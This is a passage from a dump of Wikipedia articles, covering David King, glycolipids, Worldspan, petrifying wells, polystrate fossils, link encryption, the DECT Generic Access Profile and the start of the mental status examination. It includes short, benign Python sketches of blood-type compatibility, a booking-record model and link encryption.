During his time at Cambridge, King had, together with Gabor Somorjai and Gerhard Ertl, shaped the discipline of surface science and helped to explain the underlying principles of heterogeneous catalysis. However, the 2007 Nobel Prize in Chemistry was awarded to Ertl alone. Career outside academia King was the Chief Scientific Adviser to the UK Government and Head of the Government Office for Science from October 2000 to 31 December 2007, under prime ministers Tony Blair and Gordon Brown. In that time, he raised the profile of the need for governments to act on climate change and was instrumental in creating the £1 billion Energy Technologies Institute. In 2008 he co-authored The Hot Topic on this subject. During his tenure as Chief Scientific Adviser, he raised public awareness for climate change and initiated several foresight studies. As director of the government's Foresight Programme, he created an in-depth horizon scanning process which advised government on a wide range of long-term issues, from flooding to obesity. He also chaired the government's Global Science and Innovation Forum from its inception. King advised the government on issues including: the foot-and-mouth disease epidemic 2001; post 9/11 risks to the UK; GM foods; energy provision; and innovation and wealth creation. He was heavily involved in the government's Science and Innovation Strategy 2004–2014. He suggested that scientists should honour a Hippocratic Oath for Scientists. In April 2008, King joined UBS, a Swiss investment bank, as senior science advisor. He left UBS to return to the UK government when he was appointed the Foreign Secretary's Special Representative for Climate Change in September 2013. From 2013 to 2016, King was the first chairman of the Future Cities Catapult, a government-funded body conducting research into smart cities. In May 2020, in response to the COVID-19 pandemic, King formed and led Independent SAGE, a committee of unpaid experts which acts as a "shadow" of the UK government's SAGE group to address concerns of lack of transparency and political influence on that body. Views Climate change In his role as scientific advisor to the UK government King was outspoken on the subject of climate change, saying "I see climate change as the greatest challenges facing Britain and the World in the 21st century" and "climate change is the most severe problem we are facing today – more serious even than the threat of terrorism". He strongly supports the work of the IPCC, saying in 2004 that the 2001 synthesis report "is the best current statement on the state of play of the science of climate change, and that really does represent 1,000 scientists". King criticised the Bush administration for what he saw as its failures in climate change policy, saying it is "failing to take up the challenge of global warming". In 2004, King gave evidence to a House of Commons select committee confirming his view that "on a global and geological scale that climate change is the most serious problem we are faced with this century", and illustrated it with a statement that "Fifty-five million years ago was a time when there was no ice on the earth; the Antarctic was the most habitable place for mammals". 
The Independent on Sunday reported that King had at a later event compared current and projected carbon dioxide levels with the record over the past 60 million years, and in an indirect quote suggested King implied that Antarctica was likely to be the world's "only" habitable continent by the end of this century if global warming remains unchecked. At the end of the 2007 programme "The Great Global Warming Swindle", broadcast on Channel 4, Fred Singer ridiculed the reported view of the "chief scientist"; King's complaint to Ofcom that the programme was unfair and had not given a chance to clarify was upheld, despite Channel 4's arguments that King was not named and had not challenged earlier reporting. King became head of the Climate Crisis Advisory Group in 2021, basing public meetings on a similar format to Independent SAGE, and publishing reports advising emission cuts and carbon dioxide removal. He promotes the CCAG's 4R planet pathway: Reducing emissions; Removing the excess greenhouse gases (GHGs) already in the atmosphere; Repairing ecosystems; strengthening local and global Resilience against inevitable climate impacts. Food production King told The Independent newspaper in February 2007 "he agreed that organic food was no safer than chemically-treated food" and openly supported a study by the Manchester Business School that implicated organic farming practices in unfavourable CO2 comparisons with conventional chemical farming. In an article published in The Guardian in February 2009, King is quoted as saying that "future historians might look back on our particular recent past and see the Iraq war as the first of the conflicts of this kind – the first of the resource wars" and that this was "certainly the view" (that the invasion was motivated by a desire to secure energy supplies) he held at the time of the invasion, along with "quite a few people in government". Energy King is a strong supporter of nuclear electricity generation, arguing that it is a safe, technically feasible solution that can help to reduce emissions from the utilities sector now, while the development of alternative low-carbon solutions is incentivised. In the transport sector, King has warned governments that conventional oil resources are more scarce than they believe and that peak oil might approach sooner than expected. Moreover, he has criticised first generation biofuels due to the effect on food prices and subsequent effect on the developing world. He strongly supports second generation biofuels, however, which are manufactured from inedible biomass such as corn stover, wood chips or straw. These biofuels are not made from food sources (see food vs fuel). King is a member of the Global Apollo Programme and headed its public launch in 2015. The programme calls for multinational research into reducing the cost of low-carbon electricity generation. Humanism King is a Distinguished Supporter of Humanists UK. Covid response In July 2020 King advocated for school closures in the UK until covid cases were reduced to 1 in a million. Honours and awards King was knighted in the 2003 New Year honours. In 2009, he was made a Chevalier of the Légion d'Honneur by the French government. In 1991 he received the BVC Medal and Prize, awarded by the British Vacuum Council. He was elected a Fellow of the Royal Society (FRS) in 1991, a Foreign Fellow of the American Academy of Arts and Sciences in 2002, and an Honorary Fellow of the Royal Academy of Engineering (HonFREng) in 2006. 
In media King appears in the film The Age of Stupid, released in February 2009, talking about Hurricane Katrina. He was portrayed by David Calder in the 2021 BBC television film The Trick. Personal life By his first marriage, which ended in divorce, King has two sons. In 1983, he married, secondly, charity administrator and former head of a commercial law team, Jane Margaret, daughter of general practitioner Hans Eugen Lichtenstein, OBE, of Llandrindod Wells, Powys, Wales, a Holocaust survivor from a family that owned leather goods shops and an umbrella factory in Berlin. They have a son and a daughter. Books published Sir David King, Gabrielle Walker, The Hot Topic: how to tackle global warming and still keep the lights on, Bloomsbury London 2008 Oliver Inderwildi, Sir David King, Energy, Transport & the Environment, 2012, Springer London New York Heidelberg References Biographical links David King interviewed by Alan Macfarlane 27 November 2009 (video) Sir David King at the Smith School of Enterprise and the Environment, University of Oxford Sir David King at the Department of Chemistry, University of Cambridge BBC's biography of Sir David King David King's article on climate change at www.chinadialogue.net 'Profile: Professor Sir David King' by Alison Benjamin, The Guardian, 27 November 2007. Sir David King: Building a Sustainable Future Lecture presented at the Royal Institute of British Architecture 2007 (Video) British physical chemists Fellows of the Royal Society Masters of Downing College, Cambridge Members of the University of Cambridge Department of Chemistry 1939 births Living people Knights Bachelor Knights of the Legion of Honour Academics of the University of East Anglia Chief Scientific Advisers to HM Government Place of birth missing (living people) Presidents of the British Science Association Fellows of Queens' College, Cambridge Global Apollo Programme Academics of the University of Liverpool University of the Witwatersrand alumni Fellows of the American Academy of Arts and Sciences Fellows of St John's College, Cambridge Fellows of University College, Oxford Honorary Fellows of the Royal Academy of Engineering Academics of Imperial College London Chancellors of the University of Liverpool Professors of Physical Chemistry (Cambridge)
David King (chemist)
[ "Chemistry" ]
2,492
[ "Professors of Physical Chemistry (Cambridge)", "Physical chemists" ]
1,065,208
https://en.wikipedia.org/wiki/Glycolipid
Glycolipids are lipids with a carbohydrate attached by a glycosidic (covalent) bond. Their role is to maintain the stability of the cell membrane and to facilitate cellular recognition, which is crucial to the immune response and to the connections that allow cells to bind to one another to form tissues. Glycolipids are found on the surface of all eukaryotic cell membranes, where they extend from the phospholipid bilayer into the extracellular environment. Structure The essential feature of a glycolipid is the presence of a monosaccharide or oligosaccharide bound to a lipid moiety. The most common lipids in cellular membranes are glycerolipids and sphingolipids, which have glycerol or sphingosine backbones, respectively. Fatty acids are connected to this backbone, so that the lipid as a whole has a polar head and a non-polar tail. The lipid bilayer of the cell membrane consists of two layers of lipids, with the inner and outer surfaces of the membrane made up of the polar head groups, and the inner part of the membrane made up of the non-polar fatty acid tails. The saccharides that are attached to the polar head groups on the outside of the cell are the ligand components of glycolipids, and are likewise polar, allowing them to be soluble in the aqueous environment surrounding the cell. The lipid and the saccharide form a glycoconjugate through a glycosidic bond, which is a covalent bond. The anomeric carbon of the sugar binds to a free hydroxyl group on the lipid backbone. The structure of these saccharides varies depending on the structure of the molecules to which they bind. Metabolism Glycosyltransferases Enzymes called glycosyltransferases link the saccharide to the lipid molecule, and also play a role in assembling the correct oligosaccharide so that the right receptor can be activated on the cell that responds to the presence of the glycolipid on the cell surface. The glycolipid is assembled in the Golgi apparatus and embedded in the surface of a vesicle which is then transported to the cell membrane. The vesicle merges with the cell membrane so that the glycolipid can be presented on the cell's outside surface. Glycoside hydrolases Glycoside hydrolases catalyze the breakage of glycosidic bonds. They are used to modify the oligosaccharide structure of the glycan after it has been added onto the lipid. They can also remove glycans from glycolipids to turn them back into unmodified lipids. Defects in metabolism Sphingolipidoses are a group of diseases that are associated with the accumulation of sphingolipids which have not been degraded correctly, normally due to a defect in a glycoside hydrolase enzyme. Sphingolipidoses are typically inherited, and their effects depend on which enzyme is affected and the degree of impairment. One notable example is Niemann–Pick disease, which can cause pain and damage to neural networks. Function Cell–cell interactions The main function of glycolipids in the body is to serve as recognition sites for cell–cell interactions. The saccharide of the glycolipid will bind to a specific complementary carbohydrate, or to a lectin (a carbohydrate-binding protein), of a neighboring cell. The interaction of these cell surface markers is the basis of cell recognition, and initiates cellular responses that contribute to activities such as regulation, growth, and apoptosis. Immune responses An example of how glycolipids function within the body is the interaction between leukocytes and endothelial cells during inflammation.
Selectins, a class of lectins found on the surface of leukocytes and endothelial cells, bind to the carbohydrates attached to glycolipids to initiate the immune response. This binding causes leukocytes to leave circulation and congregate near the site of inflammation. This is the initial binding mechanism, which is followed by the expression of integrins which form stronger bonds and allow leukocytes to migrate toward the site of inflammation. Glycolipids are also responsible for other responses, notably the recognition of host cells by viruses. Blood types Blood types are an example of how glycolipids on cell membranes mediate cell interactions with the surrounding environment. The four main human blood types (A, B, AB, O) are determined by the oligosaccharide attached to a specific glycolipid on the surface of red blood cells, which acts as an antigen. The unmodified antigen, called the H antigen, is the characteristic of type O, and is present on red blood cells of all blood types. Blood type A has an N-acetylgalactosamine added as the main determining structure, type B has a galactose, and type AB has all three of these antigens. Antigens which are not present in an individual's blood will cause antibodies to be produced, which will bind to the foreign glycolipids. For this reason, people with blood type AB can receive transfusions from all blood types (the universal acceptor), and people with blood type O can act as donors to all blood types (the universal donor); a minimal sketch of this compatibility logic appears at the end of this article. Types of glycolipids Glycoglycerolipids: a sub-group of glycolipids characterized by an acetylated or non-acetylated glycerol with at least one fatty acid as the lipid complex. Glyceroglycolipids are often associated with photosynthetic membranes and their functions. The subcategories of glyceroglycolipids depend on the carbohydrate attached. Galactolipids: defined by a galactose sugar attached to a glycerol lipid molecule. They are found in chloroplast membranes and are associated with photosynthetic properties. Sulfolipids: have a sulfur-containing functional group in the sugar moiety attached to a lipid. An important group is the sulfoquinovosyl diacylglycerols, which are associated with the sulfur cycle in plants. Glycosphingolipids: a sub-group of glycolipids based on sphingolipids. Glycosphingolipids are mostly located in nervous tissue and are responsible for cell signaling. Cerebrosides: a group of glycosphingolipids found in nerve cell membranes. Galactocerebrosides: a type of cerebroside with galactose as the saccharide moiety. Glucocerebrosides: a type of cerebroside with glucose as the saccharide moiety; often found in non-neural tissue. Sulfatides: a class of glycolipids containing a sulfate group in the carbohydrate with a ceramide lipid backbone. They are involved in numerous biological functions ranging from immune response to nervous system signaling. Gangliosides: the most complex animal glycolipids. They contain negatively charged oligosaccharides with one or more sialic acid residues; more than 200 different gangliosides have been identified. They are most abundant in nerve cells. Globosides: glycosphingolipids with more than one sugar as part of the carbohydrate complex. They have a variety of functions; failure to degrade these molecules leads to Fabry disease. Glycophosphosphingolipids: complex glycophospholipids from fungi, yeasts, and plants, where they were originally called "phytoglycolipids". They may be as complicated a set of compounds as the negatively charged gangliosides in animals.
Glycophosphatidylinositols: a sub-group of glycolipids defined by a phosphatidylinositol lipid moiety bound to a carbohydrate complex. They can be bound to the C-terminus of a protein and have various functions associated with the different proteins they can be bound to. See also Sophorolipid Rhamnolipid Glycocalyx Glycome Glycoprotein Niemann–Pick disease References External links Carbohydrate chemistry
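The ABO logic described in the blood-types section above reduces to one rule: a transfusion of red cells is compatible when the donor's cells carry no A or B antigen against which the recipient has antibodies. The sketch below encodes only that rule; it deliberately ignores the Rh factor and every other blood-group system.

```python
# Minimal ABO compatibility check. A donor's red cells are compatible
# when they carry no A/B antigen the recipient has antibodies against.
# The Rh factor and all other blood-group systems are ignored here.

ANTIGENS = {"A": {"A"}, "B": {"B"}, "AB": {"A", "B"}, "O": set()}

def antibodies(blood_type: str) -> set:
    """A person makes antibodies against the A/B antigens they lack."""
    return {"A", "B"} - ANTIGENS[blood_type]

def compatible(donor: str, recipient: str) -> bool:
    return not (ANTIGENS[donor] & antibodies(recipient))

# Type O red cells go to everyone (no antigens: the universal donor);
# type AB recipients accept everyone (no antibodies: universal acceptor).
for donor in ("A", "B", "AB", "O"):
    recipients = [r for r in ("A", "B", "AB", "O") if compatible(donor, r)]
    print(f"type {donor} red cells can be given to: {recipients}")
```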
Glycolipid
[ "Chemistry" ]
1,824
[ "Carbohydrates", "Glycolipids", "Carbohydrate chemistry", "Chemical synthesis", "nan", "Glycobiology" ]
1,065,209
https://en.wikipedia.org/wiki/Worldspan
Worldspan is a provider of travel technology and content and a part of the Travelport GDS business. It offers worldwide electronic distribution of travel information, Internet products and connectivity, and e-commerce capabilities for travel agencies, travel service providers and corporations. Its primary system is commonly known as a Global Distribution System (GDS), which is used by travel agents and travel related websites to book airline tickets, hotel rooms, rental cars, tour packages and associated products. Worldspan also hosts IT services and product solutions for major airlines. Recent events In December, 2006, Travelport, owner of the Galileo GDS, Gullivers Travel Associates (GTA) and a controlling share in Orbitz, agreed to acquire Worldspan. However, at the time, management of Travelport did not commit to the eventual merging of the two GDS systems, saying that they were considering all options, including running both systems in parallel. On August 21, 2007, the acquisition was completed for $1.4 billion and Worldspan became a part of Travelport GDS, which also includes Galileo and other related businesses. On September 28, 2008, the Galileo and Apollo GDS were moved from the Travelport datacenter in Denver, Colorado to the Worldspan datacenter in Atlanta, Georgia (although they continue to be run as separate systems from the Worldspan GDS). In 2012, Worldspan customers were migrated from the TPF-based FareSource pricing engine to Travelport's Linux-based 360 Fares pricing engine already used by Galileo and Apollo. Although the three systems share a common pricing platform, they continue to operate as separate GDS. History Worldspan was formed in early 1990 by Delta Air Lines, Northwest Airlines, and TWA to operate and sell its GDS services to travel agencies worldwide. Worldspan operated very effectively and profitably, successfully expanding its business in markets throughout North America, South America, Europe, and Asia. As a result, in mid-2003, Worldspan was sold by its owner airlines to Citigroup Venture Capital and Ontario Teachers' Pension Fund which in turn sold the business to Travelport in 2007. Worldspan was formed in 1990 by combining the PARS partnerships companies (owned by TWA and Northwest Airlines, Inc.) and DATAS II, a division of Delta Air Lines, Inc. One of Worldspan’s predecessors – TWA PARS – became the first GDS to be installed in travel agencies in 1976. ABACUS, an Asian company owned by a number of Asian airlines, owned a small portion of Worldspan, and Worldspan owned a small portion of Abacus. Worldspan and Abacus entered into a series of business and technology relationships. These relationships were terminated after Abacus engaged in fraudulent and deceptive practices, for which Worldspan received a sizable judgement in an arbitration in London. See also Amadeus IT Group List of global distribution systems Passenger Name Record Code sharing Travel technology References Airline tickets Travel technology Computer reservation systems
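The article's description of a GDS, a single system through which agents book flights, hotels, and cars, with each booking tracked as a record, can be made concrete with a toy data model built around the Passenger Name Record (PNR) mentioned in the see-also list. Everything below is invented for illustration; it does not reflect Worldspan's or Travelport's actual record formats or APIs.

```python
# Toy model of a GDS-style Passenger Name Record (PNR). The field names
# and structure are invented for illustration and do not document any
# real Worldspan/Travelport record format or API.
from dataclasses import dataclass, field
from typing import List

@dataclass
class Segment:
    carrier: str      # airline code, e.g. "DL"
    flight: str       # flight number
    origin: str       # IATA airport code
    destination: str  # IATA airport code
    date: str         # ISO date, kept as a string for simplicity

@dataclass
class PNR:
    record_locator: str   # the short booking reference
    passengers: List[str]
    segments: List[Segment] = field(default_factory=list)

    def add_segment(self, seg: Segment) -> None:
        self.segments.append(seg)

pnr = PNR("ABC123", ["DOE/JANE"])
pnr.add_segment(Segment("DL", "110", "ATL", "JFK", "2024-06-01"))
print(pnr.record_locator, [s.destination for s in pnr.segments])
```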
Worldspan
[ "Technology" ]
603
[ "Computer reservation systems", "Computer systems" ]
1,065,218
https://en.wikipedia.org/wiki/Petrifying%20well
A petrifying well is a well or other body of water which gives objects a stone-like appearance. If an object is placed into such a well and left there for a period of months or years, the object acquires a stony exterior. Nature At one time this petrifying property was believed to be a result of magic or witchcraft, but it is an entirely natural phenomenon, due to a process of evaporation and deposition in waters with an unusually high mineral content: as the water evaporates, the dissolved minerals are deposited as a coating on any object left in it. This petrifying process is not to be confused with petrification, wherein the constituent molecules of the original object are replaced (and not merely overlaid) with molecules of stone or mineral. Examples Notable examples of petrifying wells in England are the spring at Mother Shipton's Cave in Knaresborough and Matlock Bath, in Derbyshire. In Ireland, such wells were noted by John Rutty on Howth Head, among other locations. See also Speleothem Stalactite Stalagmite References External links Mother Shipton's Cave & the Petrifying Well Water wells Witchcraft in England English folklore
Petrifying well
[ "Chemistry", "Engineering", "Environmental_science" ]
251
[ "Hydrology", "Water wells", "Environmental engineering" ]
1,065,272
https://en.wikipedia.org/wiki/Polystrate%20fossil
A polystrate fossil is a fossil of a single organism (such as a tree trunk) that extends through more than one geological stratum. The word polystrate is not a standard geological term; it is typically found in creationist publications. The term is typically applied to "fossil forests" of upright fossil tree trunks and stumps that have been found worldwide, e.g. in the eastern United States, eastern Canada, England, France, Germany, and Australia, typically associated with coal-bearing strata. Within Carboniferous coal-bearing strata it is also very common to find what are called Stigmaria (root stocks) in the same stratum. Stigmaria are completely absent in post-Carboniferous strata, which contain either coal, polystrate trees, or both. Geological explanation In geology, such fossils are referred to as either upright fossil trunks, upright fossil trees, or T0 assemblages. According to mainstream models of sedimentary environments, they are formed by rare to infrequent brief episodes of rapid sedimentation separated by long periods of either slow deposition, nondeposition, or a combination of both. Upright fossils typically occur in layers associated with an actively subsiding coastal plain or rift basin, or with the accumulation of volcanic material around a periodically erupting stratovolcano. Typically, this period of rapid sedimentation was followed by a period of time - decades to thousands of years long - characterized by very slow or no accumulation of sediments. In river deltas and other coastal-plain settings, rapid sedimentation is often the end result of a brief period of accelerated subsidence of an area of coastal plain relative to sea level, caused by salt tectonics, global sea-level rise, growth faulting, continental margin collapse, or some combination of these factors. For example, geologists such as John W. F. Waldron and Michael C. Rygel have argued that the rapid burial and preservation of polystrate fossil trees found at Joggins, Nova Scotia directly result from rapid subsidence, caused by salt tectonics within an already subsiding pull-apart basin, and from the resulting rapid accumulation of sediments. The specific layers containing polystrate fossils occupy only a very limited fraction of the total area of any of these basins. Yellowstone The upright fossil trees of the Gallatin Petrified Forest in the Gallatin Range and the Yellowstone Petrified Forest at Amethyst Mountain and Specimen Ridge in Yellowstone National Park occur buried within the lahars and other volcanic deposits comprising the Eocene Lamar River Formation, as the result of periods of rapid sedimentation associated with explosive volcanism. This type of volcanism generates and deposits large quantities of loose volcanic material as a blanket over the slope of a volcano, as happened during the 1991 eruption of Mount Pinatubo. Both during and for years after a period of volcanism, lahars and normal stream activity wash this loose volcanic material downslope. These processes result in the rapid burial of large areas of the surrounding countryside beneath several meters of sediment, as directly observed during the 1991 eruption of Mount Pinatubo. As with modern lahar deposits, the sedimentary layers containing upright trees of the Yellowstone petrified forest are discontinuous and very limited in areal extent. Individual layers containing upright trees and individual buried forests occupy only a very small fraction of the total area of Yellowstone National Park.
Fossil soils Geologists have recognized innumerable fossil soils (paleosols) throughout the strata containing upright fossils at Joggins in Nova Scotia, in the Yellowstone petrified forests, in the coal mines of the Black Warrior Basin of Alabama, and at many other locations. The layer immediately underlying coal seams, often called either "seatearth" or "underclay", typically either consists of or contains a paleosol. Paleosols are soils which were formed by subaerial weathering during periods of very slow or no accumulation of sediments; later, renewed sedimentation buried and preserved these soils. Paleosols are identified on the basis of structures and microstructures unique to soils; animal burrows and molds of plant roots of various sizes and types; recognizable soil-profile development; and alteration of minerals by soil processes. In many cases, these paleosols are virtually identical to modern soils. Geologists who have studied upright fossils in sedimentary rocks exposed in various outcrops over decades describe the upright fossil trees as deeply rooted in place, typically in recognizable paleosols. Researchers such as Falcon and Rygel et al. have published detailed field sketches and pictures of upright tree fossils with intact root systems rooted within recognizable paleosols. In the case of the Yellowstone petrified forests, the upright fossil trees, except for relatively short stumps, are rooted in place within the underlying sediments, which typically have paleosols developed within them. Retallack (1981, 1997) has published pictures and diagrams of Yellowstone upright fossil trees with intact root systems developed within paleosols found within these strata. Formation by regeneration Geologists have also found that some of the larger upright fossil trees found within Carboniferous coal-bearing strata show evidence of regeneration after being partially buried by sediments. In these cases, the trees were clearly alive when they were partially buried. The accumulated sediment was insufficient to kill the trees immediately because of their size. As a result, some of them developed a new set of roots from their trunks just below the new ground surface. Until they either died or were overwhelmed by the accumulating sediments, these trees would likely continue to regenerate by adding height and new roots with each increment of sediment, eventually leaving several meters of former "trunk" buried underground as sediments accumulated. Formation by Carboniferous deglacial meltwater-pulses In addition, part of the Carboniferous Period was a time of extensive, thick continental ice sheets. During the Carboniferous ice age, repeated glacial–interglacial cycles caused major changes in the thickness and extent of these ice sheets. When the ice sheets expanded in extent and thickness, eustatic sea level fell substantially; when they shrank, sea level rose again by a comparable amount. As occurred during the Holocene Epoch for Meltwater pulse 1A and Meltwater pulse 1B, brief episodes of rapid melting of the Carboniferous Gondwanan continental ice sheets likely caused very rapid rises in sea level that would have abruptly inundated low-lying coastal swamps and drowned the forests growing on them.
Based on the sedimentology of the roof strata of surface and underground coal mines and of cyclothems containing the fossils of upright and in situ tree trunks, geologists have proposed that deglacial meltwater pulses rapidly flooded coastal forests over large areas of coastal swamp, particularly along preexisting coastal rivers and streams. During and after their submergence, the upright trunks of the drowned coastal forests were buried by tidally influenced sedimentation. Association with marine fossils Geologists find nothing anomalous about upright fossil trees in Carboniferous coal-bearing strata being associated with marine or brackish-water fossils. Because the trees lived on subsiding coastal plains or in pull-apart basins open to the coast, subsidence frequently outpaced the accumulation of sediments, so that adjacent shallow marine waters periodically inundated the coastal plains in which the trees were buried. As a result, sediments containing marine fossils would periodically accumulate within these areas before being replaced by coastal swamps - either as sediments filled in the shallow sea or as the sea level fell. Also, according to ecological reconstructions by geologists, specific assemblages of the types of trees found as upright fossils occupied brackish-water, even saline, coastal swamps much like modern mangrove swamps. Thus, finding marine and brackish-water fossils associated with these trees is no different from finding brackish-water or marine animals living in modern mangrove swamps. A detailed study by Taylor and Vinn (2006) of the microstructure of fossils traditionally identified as "Spirorbis" in the geological literature revealed that they comprise the remains of at least two completely different animals. Taylor and Vinn discovered that the "Spirorbis" fossils found in sedimentary strata deposited from the Ordovician to the Triassic, including the Joggins and other Carboniferous coal measures, are the remains of an extinct order of lophophorates (now called microconchids) unrelated to the modern marine tube-worms (annelids) to which the genus Spirorbis belongs. This contradicts arguments made by Harold Coffin and other creationists that "Spirorbis" fossils within strata containing polystrate fossils indicate deposition in a marine environment: the fossils are the remains of extinct fresh- and brackish-water microconchids, not of the marine genus Spirorbis as misidentified in the geologic literature. Quaternary examples Scientists interpret polystrate fossils as fossils buried in a geologically short time span - either by one large depositional event or by several smaller ones. Geologists see no need to invoke a global flood to explain upright fossils. This position is supported by numerous documented examples (a few of which are discussed below) of upright tree trunks buried in the Holocene volcanic deposits of Mount St. Helens, Skamania County, Washington, and Mount Pinatubo, Philippines; in the deltaic and fluvial sediments of the Mississippi River Delta; and in glacial deposits within the midwestern United States. These buried upright trees demonstrate that conventional geologic processes are capable of burying and preserving trees in an upright position such that, in time, they will become fossilized.
Volcanic deposits The best-documented occurrences of unfossilized buried upright trees are within the historic and late-Holocene volcanic deposits of Mount St. Helens (Skamania County, Washington) and of Mount Pinatubo in the Philippines. At Mount St. Helens, both unfossilized and partially fossilized trees have been found in many outcrops of volcanic debris flows and mudflows (lahars) and pyroclastic flow deposits, dating from 1885 to over 30,000 years BP, along the South Toutle and other rivers. Late Holocene forests of upright trees also occur within the volcanic deposits of other Cascade Range volcanoes. In the space of a few years after the eruption of Mount Pinatubo in 1991, the erosion of loose pyroclastic deposits covering the slopes of the mountain generated a series of volcanic lahars, which ultimately buried large parts of the countryside along major streams draining these slopes beneath several meters of volcanic sediments. The repeated deposition of sediments by volcanic lahars and by sediment-filled rivers created, over a period of a few years, not only innumerable polystrate trees but also "polystrate" telephone poles, churches, and houses. The volcanic deposits enclosing modern upright trees are often virtually identical - in their sedimentary structures, external and internal layering, texture, buried soils, and other general character - to the volcanic deposits containing the Yellowstone buried forests. As in the case of modern forests buried by lahars, the individual buried forests of the Yellowstone Petrified Forest and the layers containing them are very limited in their areal extent. Deltaic deposits In excavations for Interstate Highway 10, in borrow pits and landfills, and during archaeological surveys, unfossilized upright trees have been found buried within late Holocene, even historic, fluvial and deltaic sediments underlying the surface of the Mississippi River Delta and the Atchafalaya Basin of Louisiana. In one case, borrow pits dug in the natural levees of Bayou Teche near Patterson, Louisiana, have exposed completely buried, 4 to 6 feet (1.2 to 1.8 meters) high, upright trunks of cypress trees. Northeast of Donaldsonville, Louisiana, a borrow pit excavated for fill used to maintain nearby artificial levees exposed three levels of rooted upright tree trunks, stacked on top of each other, completely buried beneath the surface of Point Houmas, a patch of floodplain lying within a meander loop of the current course of the Mississippi River. While searching for buried archaeological sites, archaeologists excavated a 12 ft (3.6 meter) high upright rooted cypress tree completely buried within a natural levee of the Atchafalaya River in the Indian Bayou Wildlife Management Area just south of Krotz Springs, Louisiana. Radiocarbon dates and historic documents collected during this archaeological survey of the Indian Bayou Wildlife Management Area, in which this and other upright trees were found, demonstrated that these trees were buried in the 1800s, during the initial diversion of the Mississippi River's flow into the Atchafalaya River. Glacial deposits Unfossilized, late Pleistocene upright trees have been found buried beneath glacial deposits in North America along the southern edge of the Laurentide Ice Sheet. These buried forests were created when the southern edge of the Laurentide Ice Sheet locally dammed valleys; as a result, meltwater lakes filled these valleys and submerged the forests within them.
Sediments released by the melting of the adjacent ice sheet rapidly filled these lakes, quickly burying and preserving the submerged forests lying within them. One forest of in situ, 24,000-year-old unfossilized upright trees was exposed by excavations for a quarry near Charleston, Illinois. Excavations for a tailings pond near Marquette, Michigan, exposed an in situ forest of unfossilized trees, about 10,000 years old, buried in glacial lake and stream sediments. References External links Ferguson, L., 1988, Formation of Joggins upright fossil trees, The Joggins Fossil Cliffs, Fossils of Nova Scotia, Nova Scotia Museum, Nova Scotia. MacRae, A., 1997, "Polystrate" Tree Fossils, TalkOrigins Archive Stratigraphy Fossils Creationism
Polystrate fossil
[ "Biology" ]
2,914
[ "Creationism", "Biology theories", "Obsolete biology theories" ]
1,065,304
https://en.wikipedia.org/wiki/Link%20encryption
Link encryption is an approach to communications security that encrypts and decrypts all network traffic at each network routing point (e.g., a network switch or node through which it passes) until arrival at its final destination. This repeated decryption and encryption is necessary to allow the routing information contained in each transmission to be read and employed further to direct the transmission toward its destination, before which it is re-encrypted. This contrasts with end-to-end encryption, where internal information, but not the header/routing information, is encrypted by the sender at the point of origin and only decrypted by the intended recipient. Link encryption offers two main advantages: encryption is automatic, so there is less opportunity for human error; and, if the communications link operates continuously and carries an unvarying level of traffic, link encryption defeats traffic analysis. On the other hand, end-to-end encryption ensures that only the intended recipient has access to the plaintext. Link encryption can be used with end-to-end systems by superencrypting the messages. Bulk encryption refers to encrypting a large number of circuits at once, after they have been multiplexed. References Cryptography
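To make the hop-by-hop scheme described above concrete, here is a minimal Python sketch (illustrative only, not any real protocol). It assumes one pre-shared symmetric key per link, using the Fernet recipe from the widely available `cryptography` package; the node names and the routing-header format are hypothetical.

```python
# Minimal sketch of link encryption: each intermediate node decrypts the
# whole transmission (including its routing header), reads where to forward
# it, and re-encrypts it with the key of the next link.
from cryptography.fernet import Fernet

# One symmetric key per link on a hypothetical path A -> B -> C -> D.
link_keys = {
    ("A", "B"): Fernet.generate_key(),
    ("B", "C"): Fernet.generate_key(),
    ("C", "D"): Fernet.generate_key(),
}

def send_over_link(link, plaintext: bytes) -> bytes:
    """Encrypt the full transmission (header and payload) for one link."""
    return Fernet(link_keys[link]).encrypt(plaintext)

def receive_over_link(link, ciphertext: bytes) -> bytes:
    """Decrypt at the receiving node; the plaintext is exposed here."""
    return Fernet(link_keys[link]).decrypt(ciphertext)

message = b"to=D|payload=hello"          # routing header travels with the data
for hop in [("A", "B"), ("B", "C"), ("C", "D")]:
    ciphertext = send_over_link(hop, message)
    # ... transmission over the protected physical link ...
    message = receive_over_link(hop, ciphertext)  # node reads the header here

assert message == b"to=D|payload=hello"
```

Note that every intermediate node briefly holds the plaintext, which is precisely the property that distinguishes link encryption from end-to-end encryption.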
Link encryption
[ "Mathematics", "Engineering" ]
249
[ "Applied mathematics", "Cryptography", "Cybersecurity engineering" ]
1,065,315
https://en.wikipedia.org/wiki/Generic%20access%20profile
The Generic Access Profile (GAP) (ETSI standard EN 300 444) describes a set of mandatory requirements to allow any conforming DECT Fixed Part (base) to interoperate with any conforming DECT Portable Part (handset) to provide basic telephony services when attached to a 3.1 kHz telephone network (as defined by EN 300 176-2). The objective of GAP is to ensure interoperation at the air interface (i.e., the radio connection) and at the level of procedures to establish, maintain and release telephone calls (Call Control). GAP also mandates procedures for registering Portable Parts to a Fixed Part (Mobility Management). A GAP-compliant handset from one manufacturer should work, at the basic level of making calls, with a GAP-compliant base from another manufacturer, although it may be unable to access advanced features of the base station such as phone book synchronization or remote operation of an answering machine. Most consumer-level DECT phones and base stations support GAP, even those that do not publicize the feature, and thus can be used together. However, some manufacturers lock their systems to prevent interoperability, or supply bases that cannot register new handsets. The GAP does not describe how the Fixed Part is connected to the external telephone network. See also GSM Interworking Profile References ETSI Telephony DECT
Generic access profile
[ "Technology" ]
285
[ "Mobile telecommunications", "DECT" ]
1,065,357
https://en.wikipedia.org/wiki/Mental%20status%20examination
The mental status examination (MSE) is an important part of the clinical assessment process in neurological and psychiatric practice. It is a structured way of observing and describing a patient's psychological functioning at a given point in time, under the domains of appearance, attitude, behavior, mood and affect, speech, thought process, thought content, perception, cognition, insight, and judgment. There are some minor variations in the subdivision of the MSE and the sequence and names of MSE domains. The purpose of the MSE is to obtain a comprehensive cross-sectional description of the patient's mental state, which, when combined with the biographical and historical information of the psychiatric history, allows the clinician to make an accurate diagnosis and formulation, which are required for coherent treatment planning. The data are collected through a combination of direct and indirect means: unstructured observation while obtaining the biographical and social information, focused questions about current symptoms, and formalised psychological tests. The MSE is not to be confused with the mini–mental state examination (MMSE), which is a brief neuropsychological screening test for dementia. Theoretical foundations The MSE derives from an approach to psychiatry known as descriptive psychopathology or descriptive phenomenology, which developed from the work of the philosopher and psychiatrist Karl Jaspers. From Jaspers' perspective it was assumed that the only way to comprehend a patient's experience is through his or her own description (through an approach of empathic and non-theoretical enquiry), as distinct from an interpretive or psychoanalytic approach which assumes the 